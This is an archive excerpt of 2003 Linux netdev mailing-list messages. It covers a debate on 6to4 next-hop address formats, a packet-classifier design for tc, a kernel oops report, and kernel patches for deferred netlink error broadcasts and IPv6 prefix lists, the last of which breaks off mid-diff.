(cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HBEpFl001809 for ; Thu, 17 Jul 2003 04:14:53 -0700 Received: from hades.pp.htv.fi (liljeber@localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6HBGRLH024617; Thu, 17 Jul 2003 14:16:27 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6HBGQvU024616; Thu, 17 Jul 2003 14:16:26 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: Re: Fw: [PATCH] IPv6: Allow 6to4 routes with SIT From: Mika Liljeberg To: Pekka Savola Cc: kuznet@ms2.inr.ac.ru, davem@redhat.com, jmorris@redhat.com, netdev@oss.sgi.com In-Reply-To: References: Content-Type: text/plain Content-Transfer-Encoding: 7bit Message-Id: <1058440586.5781.59.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.3 Date: 17 Jul 2003 14:16:26 +0300 X-archive-position: 4133 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com Precedence: bulk X-list: netdev On Thu, 2003-07-17 at 10:04, Pekka Savola wrote: > > ip route add 3ffe::.... via 193.233.7.65 > > That would be simpler but, we actually require: > > ip route add 3ffe::... via ::193.233.7.65 > > and thus require a route for ::/96. That's confusing: ::/96 has a very > specific purpose in RFCs, and we should not be overloading the > functionality, it's just plain confusing. I agree with Pekka. Alexey, you yourself admitted that this hack was put in, because you needed a way to represent an IPv4 address in IPv6 format. The IPv4-mapped format (::ffff:a.b.c.d) exists exactly for this purpose. User space tools can accept it as a.b.c.d and convert to IPv4-Mapped for the IPv6 API. There is no need to invent non-standard practises. It may be convenient to think that the IPv4 Internet is a virtual link connecting all 6to4 routers and IPv4 compatible addresses could be seen as the link-local addresses, but this is just an affectation that is not backed by any IETF specification. Overloading the IPv4-compatible address in this way is just confusing, because it creates the impression that the stack will actually take steps to resolve the gateway address to a next hop address that is on-link. (I'm not saying it should, but you can see where the confusion arises). MikaL From mika.liljeberg@welho.com Thu Jul 17 04:53:22 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 04:53:30 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HBrKFl002957 for ; Thu, 17 Jul 2003 04:53:21 -0700 Received: from hades.pp.htv.fi (liljeber@localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6HBswLH024717; Thu, 17 Jul 2003 14:54:58 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6HBsvnq024716; Thu, 17 Jul 2003 14:54:57 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: Re: Fw: [PATCH] IPv6: Allow 6to4 routes with SIT From: Mika Liljeberg To: Pekka Savola Cc: kuznet@ms2.inr.ac.ru, davem@redhat.com, jmorris@redhat.com, netdev@oss.sgi.com In-Reply-To: <1058440586.5781.59.camel@hades> References: <1058440586.5781.59.camel@hades> Content-Type: text/plain Content-Transfer-Encoding: 7bit Message-Id: <1058442897.5780.69.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.3 Date: 17 Jul 2003 14:54:57 +0300 X-archive-position: 4134 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com Precedence: bulk X-list: netdev On Thu, 2003-07-17 at 14:16, Mika Liljeberg wrote: > On Thu, 2003-07-17 at 10:04, Pekka Savola wrote: > > > ip route add 3ffe::.... via 193.233.7.65 > > > > That would be simpler but, we actually require: > > > > ip route add 3ffe::... via ::193.233.7.65 > > > > and thus require a route for ::/96. That's confusing: ::/96 has a very > > specific purpose in RFCs, and we should not be overloading the > > functionality, it's just plain confusing. > > I agree with Pekka. Alexey, you yourself admitted that this hack was put > in, because you needed a way to represent an IPv4 address in IPv6 > format. The IPv4-mapped format (::ffff:a.b.c.d) exists exactly for this > purpose. User space tools can accept it as a.b.c.d and convert to > IPv4-Mapped for the IPv6 API. There is no need to invent non-standard > practises. Ok, I have to correct myself a bit here. Looking at the 6to4 RFC it actually does recommend the fe80::v4addr format, already mentioned, in case a link-local address is needed. So we would have: ip route add 3ffe:... via fe80::bada:bee4 dev sitX Clean, although not as convenient for the user. MikaL From nf@hipac.org Thu Jul 17 06:14:23 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 06:14:38 -0700 (PDT) Received: from indyio.rz.uni-saarland.de (indyio.rz.uni-saarland.de [134.96.7.3]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HDEKFl005545 for ; Thu, 17 Jul 2003 06:14:22 -0700 Received: from mars.rz.uni-saarland.de (mars.rz.uni-saarland.de [134.96.7.4]) by indyio.rz.uni-saarland.de (8.12.9/8.12.5) with ESMTP id h6HDECqk2847454; Thu, 17 Jul 2003 15:14:12 +0200 (CEST) Received: from e002.stw.stud.uni-saarland.de (e002.stw.stud.uni-saarland.de [134.96.65.17]) by mars.rz.uni-saarland.de (8.9.3p2/8.8.4/8.8.2) with ESMTP id PAA12803168; Thu, 17 Jul 2003 15:14:11 +0200 (CEST) Received: from e226.stw.stud.uni-saarland.de ([134.96.65.241] helo=hipac.org) by e002.stw.stud.uni-saarland.de with esmtp (Exim 3.35 #1 (Debian)) id 19d8aJ-0005EA-00; Thu, 17 Jul 2003 15:14:11 +0200 Message-ID: <3F16A0E5.1080007@hipac.org> Date: Thu, 17 Jul 2003 15:13:09 +0200 From: Michael Bellion and Thomas Heinz User-Agent: Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.4) Gecko/20030714 Debian/1.4-2 X-Accept-Language: de, en MIME-Version: 1.0 To: hadi@cyberus.ca CC: linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [RFC] High Performance Packet Classifiction for tc framework References: <200307141045.40999.nf@hipac.org> <1058328537.1797.24.camel@jzny.localdomain> In-Reply-To: <1058328537.1797.24.camel@jzny.localdomain> X-Enigmail-Version: 0.76.2.0 X-Enigmail-Supports: pgp-inline, pgp-mime Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="------------enig7E93A75E61DF18B37FB81F90" X-archive-position: 4135 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: nf@hipac.org Precedence: bulk X-list: netdev This is an OpenPGP/MIME signed message (RFC 2440 and 3156) --------------enig7E93A75E61DF18B37FB81F90 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Hi Jamal You wrote: > This is good.I may have emailed you about this topic before? Yes, but at that time we had not any concrete plans to integrate hipac into tc. We focussed on making nf-hipac as expressive as iptables first. > It's a classifier therefore it makes sense ;-> :-) > nice. What would be interesting is to see your rule update rates vs > iptables (i expect iptables to suck) - but how do you compare aginst any > of the tc classifiers for example? Regarding the rule update rates we have not done any measurements yet but nf-hipac should be faster than iptables (even more when we have implemented the selective cloning stuff). On the other hand we are probably slower than tc because in addition to the insert operation into an internal chain there is the actual hipac insert operation. The insertion in the internal chain is quicker than the tc insert operation because we use doubly linked lists. Regarding the matching performance one has to consider a few things. The currently existing tc classifiers are an abstraction for rules (iptables "slang") whilst hipac is an abstraction for a set of rules (including the chain semantics known from iptables), i.e. a table in the iptables world. Of course it is possible to have some sort of extended classifying in tc too, i.e. you can add several fw or u32 filters with the same prio which allows the filters to be hashed. One disadvantage of this concept is that the hashed filters must be compact, i.e. there cannot be other classifiers in between. Another major disadvantage is caused by the hashing scheme. If you use the hash for 1 dimension you have to make sure that either all filters in a certain bucket are disjoint or you must have an implicit ordering of the rules (according to the insertion order or something). This scheme is not extendable to 2 or more dimensions, i.e. 1 hash for src ip, #(src ip buckets) many dst ip hashes and so on, because you simply cannot express arbitrary rulesets. Another general problem is of course that the user has to manually setup the hash which is rather inconvenient. Now, what are the implications on the matching performance: tc vs. nf-hipac? As long as the extended hashing stuff is not used nf-hipac is clearly superior to tc. When hashing is used it _really_ depends. If there is only one classifier (with hashing) per interface and the number of rules per bucket is very small the performance should be comparable. As soon as you add other classifiers nf-hipac will outperform tc again. >>The tc framework is very flexible with respect to where filters can be >>attached. Unfortunately this cannot be mapped into one HIPAC data >>structure. Our current design allows to attach filters anywhere but >>only the filters attached to the top level qdisc would benefit from the >>HIPAC algorithm. Would this be a noticeable restriction? > > I dont think so, but can ytou describe this restriction? Well, we thought a little more about the design and came to the conclusion that it is not necessary to have a HIPAC qdisc at root but it suffices to ensure that the HIPAC classifier occurs only once per interface. As you can guess from the last sentence we dropped the HIPAC qdisc design and changed to the following scheme: - there no special HIPAC qdisc at all :-) - the HIPAC classifier is no longer a simple rule but represents the whole table - the HIPAC classifier can occur in any qdisc but at most once per interface So, basically HIPAC is just a normal classifier like any other with two exceptions: a) it can occur only once per interface b) the rules within the classifier can contain other classifiers, e.g. u32, fw, tc_index, as matches There is just one problem with the current tc framework. Once a new filter is inserted into the chain it is not removed even if the change function of the classifier returns < 0 (2.6.0-test1: net/sched/cls_api.c: line 280f). This should be changed anyway, shouldn't it? >>- new HIPAC classifier which supports all native nf-hipac matches >> (src/dst ip, proto, src/dst port, ttl, state, in_iface, icmp type, >> tcpflags, fragments) and additionally fwmark > > I would think for cleanliness fwmark or any metadata related > classification would be separate from one that is based on packet bits. Since our classifier represents a table of rules and the rules are based on different matches, like src/dst ip and also fwmark (native) or u32 (subclassifier as match), this is definitely a clean design. >>- the HIPAC classifier can only be attached to the HIPAC qdisc and vice >> versa the HIPAC qdisc only accepts HIPAC classifiers > > > We do have an issue with being able to do extended classification > but building a qdisc for it is a no no. Building a qdisc that will force > other classifier to structure themselves after it is even a bigger sin. > Look at the action code i have (i can send you an updated patch); a > better idea is to make extended classifiers an action based on another > filter match. At least this is what i have been toying with and i dont > think it is clean enough. what we need is to extend the filtering > framework itself to have extended classifiers. The new design should be much cleaner. Originally we also thought about making HIPAC a classifier only but we expected some problems related to this approach. Finally we discovered that this is not the case :) Regards, +-----------------------+----------------------+ | Michael Bellion | Thomas Heinz | | | | +-----------------------+----------------------+ | High Performance Packet Classification | | nf-hipac: http://www.hipac.org/ | +----------------------------------------------+ --------------enig7E93A75E61DF18B37FB81F90 Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) Comment: Using GnuPG with Debian - http://enigmail.mozdev.org iD8DBQE/FqDxtXh2AYIMjggRAnVNAKCYNTOiCa/Op3UREZhsVmSzfccRTgCgqaIO uzyXIMuow/L2f4qAejQgTaQ= =mgBg -----END PGP SIGNATURE----- --------------enig7E93A75E61DF18B37FB81F90-- From pekkas@netcore.fi Thu Jul 17 06:55:31 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 06:55:43 -0700 (PDT) Received: from netcore.fi (netcore.fi [193.94.160.1]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HDtTFl006712 for ; Thu, 17 Jul 2003 06:55:31 -0700 Received: from localhost (pekkas@localhost) by netcore.fi (8.11.6/8.11.6) with ESMTP id h6HDtE006364; Thu, 17 Jul 2003 16:55:14 +0300 Date: Thu, 17 Jul 2003 16:55:14 +0300 (EEST) From: Pekka Savola To: Mika Liljeberg cc: kuznet@ms2.inr.ac.ru, , , Subject: Re: Fw: [PATCH] IPv6: Allow 6to4 routes with SIT In-Reply-To: <1058442897.5780.69.camel@hades> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4136 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: pekkas@netcore.fi Precedence: bulk X-list: netdev On 17 Jul 2003, Mika Liljeberg wrote: > On Thu, 2003-07-17 at 14:16, Mika Liljeberg wrote: > > On Thu, 2003-07-17 at 10:04, Pekka Savola wrote: > > > > ip route add 3ffe::.... via 193.233.7.65 > > > > > > That would be simpler but, we actually require: > > > > > > ip route add 3ffe::... via ::193.233.7.65 > > > > > > and thus require a route for ::/96. That's confusing: ::/96 has a very > > > specific purpose in RFCs, and we should not be overloading the > > > functionality, it's just plain confusing. > > > > I agree with Pekka. Alexey, you yourself admitted that this hack was put > > in, because you needed a way to represent an IPv4 address in IPv6 > > format. The IPv4-mapped format (::ffff:a.b.c.d) exists exactly for this > > purpose. User space tools can accept it as a.b.c.d and convert to > > IPv4-Mapped for the IPv6 API. There is no need to invent non-standard > > practises. > > Ok, I have to correct myself a bit here. Looking at the 6to4 RFC it > actually does recommend the fe80::v4addr format, already mentioned, in > case a link-local address is needed. Note that the spec refers to the generation of your *own* fe80::x address, in the case that e.g. the implementations like to have link-local addresses on interfaces. One doesn't say that when you're contacting 6to4 relays, you should use a link-local address formed like above to communicagte the IP address. > So we would have: > > ip route add 3ffe:... via fe80::bada:bee4 dev sitX > > Clean, although not as convenient for the user. I disagree a bit on cleanliness. The problem with the above is that when you see the next-hop "fe80::bada:bee4", you can't have any idea whether it really means "tunnel to (dec)bada:bee4" or "a router known as fe80::bada:bee4". It depends on the interface. The context of 6to4 is lost. For that reason, IMO 2002:v4:addr is the clearest, and "via v4addr" seems like the next best one (IMHO). -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings From mika.liljeberg@welho.com Thu Jul 17 07:33:58 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 07:34:09 -0700 (PDT) Received: from hades.pp.htv.fi (cs180094.pp.htv.fi [213.243.180.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HEXtFl007935 for ; Thu, 17 Jul 2003 07:33:57 -0700 Received: from hades.pp.htv.fi (liljeber@localhost [127.0.0.1]) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) with ESMTP id h6HEZbLH025327; Thu, 17 Jul 2003 17:35:37 +0300 Received: (from liljeber@localhost) by hades.pp.htv.fi (8.12.9/8.12.9/Debian-5) id h6HEZaFC025326; Thu, 17 Jul 2003 17:35:36 +0300 X-Authentication-Warning: hades.pp.htv.fi: liljeber set sender to mika.liljeberg@welho.com using -f Subject: Re: Fw: [PATCH] IPv6: Allow 6to4 routes with SIT From: Mika Liljeberg To: Pekka Savola Cc: kuznet@ms2.inr.ac.ru, davem@redhat.com, jmorris@redhat.com, netdev@oss.sgi.com In-Reply-To: References: Content-Type: text/plain Content-Transfer-Encoding: 7bit Message-Id: <1058452536.5781.87.camel@hades> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.3 Date: 17 Jul 2003 17:35:36 +0300 X-archive-position: 4137 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mika.liljeberg@welho.com Precedence: bulk X-list: netdev Pekka, Looks like I've talked myself around to Alexey's point of view. :-) On Thu, 2003-07-17 at 16:55, Pekka Savola wrote: > Note that the spec refers to the generation of your *own* fe80::x address, > in the case that e.g. the implementations like to have link-local > addresses on interfaces. One doesn't say that when you're contacting 6to4 > relays, you should use a link-local address formed like above to > communicagte the IP address. Yes, but section 3.7 of rfc2893 talks about the use of that link-layer address with routing protocols. I take this to include "as next hop address". > I disagree a bit on cleanliness. The problem with the above is that when > you see the next-hop "fe80::bada:bee4", you can't have any idea whether it > really means "tunnel to (dec)bada:bee4" or "a router known as > fe80::bada:bee4". It depends on the interface. The context of 6to4 is > lost. I would say that is a feature. The next hop address *always* identifies the next hop router, and it's a link-local unicast as it is supposed to be. In the case of 6to4, the next hop router just happens to be a 6to4 relay located on the virtual link provided by the SIT interface. The tunneling is purely a property of the SIT interface, the routing code doesn't have to care. Theoretically, you could even create solicited node multicast addresses the same way and run ND over the tunnel (not that it's needed). MikaL From andersg@0x63.nu Thu Jul 17 08:14:04 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 08:14:17 -0700 (PDT) Received: from gagarin.0x63.nu (mail@h55p111.delphi.afb.lu.se [130.235.187.184]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HFE2Fl009267 for ; Thu, 17 Jul 2003 08:14:04 -0700 Received: from andersg by gagarin.0x63.nu with local (Exim 3.36 #1 (Debian)) id 19dASA-0002p0-00; Thu, 17 Jul 2003 17:13:54 +0200 Date: Thu, 17 Jul 2003 17:13:54 +0200 To: netdev@oss.sgi.com Cc: yoshfuji@linux-ipv6.org Subject: OOPS in ip6_output2 Message-ID: <20030717151354.GA10640@h55p111.delphi.afb.lu.se> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.5.4i From: Anders Gustafsson X-Scanner: exiscan *19dASA-0002p0-00*vKm/Ri6jTfU*0x63.nu X-archive-position: 4138 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: andersg@0x63.nu Precedence: bulk X-list: netdev I don't follow netdev so maybe this is old stuff, but I got this oops when trying to ssh to a ipv6-host. The defaultroute seems garbled too: (or maybe that is what causes it) andersg@laika:~$ ip -6 ro l default default via 90a6:1840:c79a:1840:: dev eth1 proto kernel metric 1024 expires 17643sec mtu 1500 advmss 1440 but I got the correct prefix from radvd. Unable to handle kernel NULL pointer dereference at virtual address 00000000 printing eip: 00000000 *pde = 00000000 Oops: 0000 [#1] CPU: 0 EIP: 0060:[<00000000>] Not tainted EFLAGS: 00010282 EIP is at 0x0 eax: cc5fc004 ebx: ca581004 ecx: cc9d4004 edx: ca55e084 esi: ca581004 edi: 00000000 ebp: 00000000 esp: ca315ca8 ds: 007b es: 007b ss: 0068 Process ssh (pid: 1652, threadinfo=ca314000 task=ca3e1000) Stack: c02ad9a2 ca581004 00000000 00000000 ca315d94 ca4d6004 00000000 00000000 000005dc ca581004 00000000 00000028 c02adec1 ca581004 ca315d4c 00000010 00000000 00000000 00000000 00000096 00000096 c119c8c8 00000000 cc0bf004 Call Trace: [] ip6_output2+0x172/0x250 [] ip6_xmit+0x201/0x3a0 [] tcp_v6_xmit+0x118/0x250 [] tcp_transmit_skb+0x3e5/0x600 [] tcp_connect+0x3bc/0x490 [] tcp_v6_connect+0x3bb/0x7c0 [] inet_stream_connect+0x114/0x260 [] sys_connect+0x85/0xc0 [] sock_map_fd+0xfa/0x130 [] sys_socket+0x3d/0x60 [] sys_socketcall+0xd1/0x2a0 [] syscall_call+0x7/0xb -- Anders Gustafsson - andersg@0x63.nu - http://0x63.nu/ From jkenisto@us.ibm.com Thu Jul 17 12:16:33 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 12:16:46 -0700 (PDT) Received: from e3.ny.us.ibm.com (e3.ny.us.ibm.com [32.97.182.103]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HJGPFl019582 for ; Thu, 17 Jul 2003 12:16:33 -0700 Received: from northrelay04.pok.ibm.com (northrelay04.pok.ibm.com [9.56.224.206]) by e3.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6HJFFpW176692; Thu, 17 Jul 2003 15:15:15 -0400 Received: from us.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay04.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6HJFAhA126834; Thu, 17 Jul 2003 15:15:11 -0400 Message-ID: <3F16F54C.949A9299@us.ibm.com> Date: Thu, 17 Jul 2003 12:13:16 -0700 From: Jim Keniston X-Mailer: Mozilla 4.75 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: Andrew Morton CC: jmorris@intercode.com.au, davem@redhat.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, jgarzik@pobox.com, alan@lxorguk.ukuu.org.uk, rddunlap@osdl.org, kuznet@ms2.inr.ac.ru, jkenisto@us.ibm.com Subject: Re: [PATCH] [1/2] kernel error reporting (revised) References: <3F143D0A.A052F0B6@us.ibm.com> <20030715125121.315920a2.akpm@osdl.org> Content-Type: multipart/mixed; boundary="------------1C2AB73BB6D657AFF025223B" X-archive-position: 4139 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jkenisto@us.ibm.com Precedence: bulk X-list: netdev This is a multi-part message in MIME format. --------------1C2AB73BB6D657AFF025223B Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Andrew Morton wrote: > > Jim Keniston wrote: > > > > +int kernel_error_event_iov(const struct iovec *iov, unsigned int nseg, > > + u32 groups) > > +{ > > ... > > + > > + return netlink_broadcast(kerror_nl, skb, 0, ~0, GFP_ATOMIC); > > This appears to be deadlocky when called from interrupt handlers. > > netlink_broadcast() does read_lock(&nl_table_lock). But nl_table_lock is > not an irq-safe lock. > > Possibly netlink_broadcast() can be made callable from hardirq context, but > it looks to be non trivial. The various error and delivery handlers need > to be reviewed, Yes indeed. I believe this issue is resolved by detecting that we're in an interrupt handler and delaying the call to netlink_broadcast() via a tasklet. See the enclosed patch to the previously posted rev. I'll update the full patch at http://prdownloads.sourceforge.net/evlog/kerror-2.5.75.patch?download An issue remains: what, if anything, to tell the caller if the delayed netlink_broadcast() fails. See below for further thoughts. > the kfree_skb() calls should be thought about, etc. I've thought about them. :-) Given the aforementioned solution, I don't think kfree_skb() is an issue, because it's called as needed by netlink_broadcast(). If I'm missing something here, feel free to clarify. Thanks. Jim WHAT IF THE DELAYED netlink_broadcast() CALL FAILS? 1. Can we detect from IRQ context that nobody is listening, and thereby return -ESRCH to the caller? No, to do that would require perusing the nl_table[NETLINK_KERROR] list. We can't do that for the same reason we can't call netlink_broadcast(). So kernel_error_event_iov() now returns -EINPROGRESS if it had to delay the netlink_broadcast() call. 2. Could the tasklet report netlink_broadcast() failures back to the higher-level code? Yes, we could implement a per-group callback to handle that. Current thinking is that it's overkill. But it would resolve the next issue... 3. Given the above, what should the evlog.c caller do when kernel_error_event_iov() returns -EINPROGRESS? a. Nothing. Figure the packet will probably get logged. b. Just to be safe, report it via printk, the same way we report dropped packets. We currently do (a). (b) would mean that every event logged from IRQ context would be cc-ed to printk. ----- --------------1C2AB73BB6D657AFF025223B Content-Type: text/plain; charset=us-ascii; name="kerror.patch.txt" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="kerror.patch.txt" --- kerror.c.old Thu Jul 17 10:53:19 2003 +++ kerror.c Thu Jul 17 10:54:55 2003 @@ -3,10 +3,12 @@ * Copyright (C) 2003 David S. Miller (davem@redhat.com) * June 2003 - Jim Keniston and Dan Stekloff (kenistoj and dsteklof@us.ibm.com) * Fixed a couple of bugs and added iovec interface. + * July 2003 - Jim Keniston - Added handling of packets logged from IRQ context. */ #include #include +#include #include #include #include @@ -17,6 +19,33 @@ static struct sock *kerror_nl; +/* Packets logged from IRQ context are queued for broadcast by a tasklet. */ +static struct sk_buff_head delayed_pkts; +static void broadcast_delayed_pkts(unsigned long); +static DECLARE_TASKLET(delayed_pkts_tasklet, broadcast_delayed_pkts, 0); + +/** + * delayed_broadcast() - Schedule a tasklet to broadcast a packet. + * We want to broadcast the indicated packet, but can't because we're + * in a hardware interrupt and so can't call netlink_broadcast(). + * Schedule a tasklet to do the job. + * + * @skb: the socket buffer to broadcast + */ +static void delayed_broadcast(struct sk_buff *skb) +{ + skb_queue_tail(&delayed_pkts, skb); + tasklet_schedule(&delayed_pkts_tasklet); +} + +static void broadcast_delayed_pkts(unsigned long ignored) +{ + struct sk_buff *skb; + while ((skb = skb_dequeue(&delayed_pkts)) != NULL) { + (void) netlink_broadcast(kerror_nl, skb, 0, ~0, GFP_ATOMIC); + } +} + /** * kernel_error_event_iov() - Broadcast packet to NETLINK_KERROR sockets. * @iov: the packet's data @@ -54,6 +83,11 @@ NETLINK_CB(skb).dst_groups = groups; + if (in_irq()) { + delayed_broadcast(skb); + return -EINPROGRESS; + } + return netlink_broadcast(kerror_nl, skb, 0, ~0, GFP_ATOMIC); nlmsg_failure: @@ -85,6 +119,7 @@ if (kerror_nl == NULL) panic("kerror_init: cannot initialize kerror_nl\n"); + skb_queue_head_init(&delayed_pkts); return 0; } --------------1C2AB73BB6D657AFF025223B-- From krkumar@us.ibm.com Thu Jul 17 14:15:23 2003 Received: with ECARTIS (v1.0.0; list netdev); Thu, 17 Jul 2003 14:15:36 -0700 (PDT) Received: from e1.ny.us.ibm.com (e1.ny.us.ibm.com [32.97.182.101]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h6HLFFFl029355 for ; Thu, 17 Jul 2003 14:15:22 -0700 Received: from northrelay04.pok.ibm.com (northrelay04.pok.ibm.com [9.56.224.206]) by e1.ny.us.ibm.com (8.12.9/8.12.2) with ESMTP id h6HLEMKb212054; Thu, 17 Jul 2003 17:14:22 -0400 Received: from DYN318430.beaverton.ibm.com (d01av02.pok.ibm.com [9.56.224.216]) by northrelay04.pok.ibm.com (8.12.9/NCO/VER6.5) with ESMTP id h6HLEChB044924; Thu, 17 Jul 2003 17:14:13 -0400 Date: Thu, 17 Jul 2003 14:12:37 -0700 (PDT) From: Krishna Kumar X-X-Sender: krkumar@DYN318430.beaverton.ibm.com To: kuznet@ms2.inr.ac.ru cc: yoshfuji@linux-ipv6.org, , , Subject: [PATCH 1/2] Prefix List and O/M flags against 2.5.73 In-Reply-To: <200307170038.EAA12945@dub.inr.ac.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 4140 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: krkumar@us.ibm.com Precedence: bulk X-list: netdev > > This is sort of what I had originally, so I should be able to change > > it to do this quite easily. I didn't like the earlier suggestion of > > using existing RTM_xxxLINK with RTM_xxxIFACE (since it was dev generic), > > but having a new interface RTM_xxxIFACE sounds good to me. > Actually, the original plan was to use ifli_family to query something > or to direct a request to a specific interface on some netdevice. > I wanted to reserve IFLI_PROTINFO attribute to encapsulate information > private for specific family. It was not realized mostly because of absense > of such information. > > Maybe, you will want to resurrect this. I am sorry, but I have no idea what you are talking about :-) I am including patch with what was agreed upon yesterday by everyone. I have tested the prefix list retrieval by using ip (with slight changes to ip command,now I can dump prefix by "ip -f inet6 route prefix", with identical format to "ip -f inet6 route" command). For the O/M flags, I am using a new RTM_GETIFFLAGS but if needed this can be changed to use RTM_GETLNKINFO (or something) with RTA_IFFLAGS, if multiple data needs to be returned. If that is needed, I can submit a (5 line?) patch to be applied after this is accepted.. Thanks, - KK diff -ruN linux-2.5.73.org/include/linux/ipv6_route.h test/linux-2.5.73/include/linux/ipv6_route.h --- linux-2.5.73.org/include/linux/ipv6_route.h 2003-06-22 11:32:36.000000000 -0700 +++ test/linux-2.5.73/include/linux/ipv6_route.h 2003-07-17 11:38:23.000000000 -0700 @@ -16,6 +16,7 @@ #define RTF_DEFAULT 0x00010000 /* default - learned via ND */ #define RTF_ALLONLINK 0x00020000 /* fallback, no routers on link */ #define RTF_ADDRCONF 0x00040000 /* addrconf route - RA */ +#define RTF_PREFIX_RT 0x00080000 /* A prefix only route - RA */ #define RTF_NONEXTHOP 0x00200000 /* route with no nexthop */ #define RTF_EXPIRES 0x00400000 diff -ruN linux-2.5.73.org/include/linux/rtnetlink.h test/linux-2.5.73/include/linux/rtnetlink.h --- linux-2.5.73.org/include/linux/rtnetlink.h 2003-06-22 11:33:07.000000000 -0700 +++ test/linux-2.5.73/include/linux/rtnetlink.h 2003-07-16 17:23:06.000000000 -0700 @@ -47,7 +47,9 @@ #define RTM_DELTFILTER (RTM_BASE+29) #define RTM_GETTFILTER (RTM_BASE+30) -#define RTM_MAX (RTM_BASE+31) +#define RTM_GETIFFLAGS (RTM_BASE+34) + +#define RTM_MAX (RTM_GETIFFLAGS+1) /* Generic structure for encapsulation of optional route information. @@ -61,6 +63,13 @@ unsigned short rta_type; }; +/* Structure to return per interface device flags */ +struct ifp_if6info +{ + int ifindex; + int flags; +}; + /* Macros to handle rtattributes */ #define RTA_ALIGNTO 4 @@ -168,6 +177,7 @@ #define RTM_F_NOTIFY 0x100 /* Notify user of route change */ #define RTM_F_CLONED 0x200 /* This route is cloned */ #define RTM_F_EQUALIZE 0x400 /* Multipath equalizer: NI */ +#define RTM_F_PREFIX 0x800 /* Prefix addresses */ /* Reserved table identifiers */ diff -ruN linux-2.5.73.org/include/net/if_inet6.h test/linux-2.5.73/include/net/if_inet6.h --- linux-2.5.73.org/include/net/if_inet6.h 2003-06-22 11:33:32.000000000 -0700 +++ test/linux-2.5.73/include/net/if_inet6.h 2003-07-16 17:23:24.000000000 -0700 @@ -17,6 +17,8 @@ #include +#define IF_RA_OTHERCONF 0x80 +#define IF_RA_MANAGED 0x40 #define IF_RA_RCVD 0x20 #define IF_RS_SENT 0x10 diff -ruN linux-2.5.73.org/net/ipv6/addrconf.c test/linux-2.5.73/net/ipv6/addrconf.c --- linux-2.5.73.org/net/ipv6/addrconf.c 2003-06-22 11:33:17.000000000 -0700 +++ test/linux-2.5.73/net/ipv6/addrconf.c 2003-07-17 11:40:48.000000000 -0700 @@ -129,7 +129,7 @@ static int addrconf_ifdown(struct net_device *dev, int how); -static void addrconf_dad_start(struct 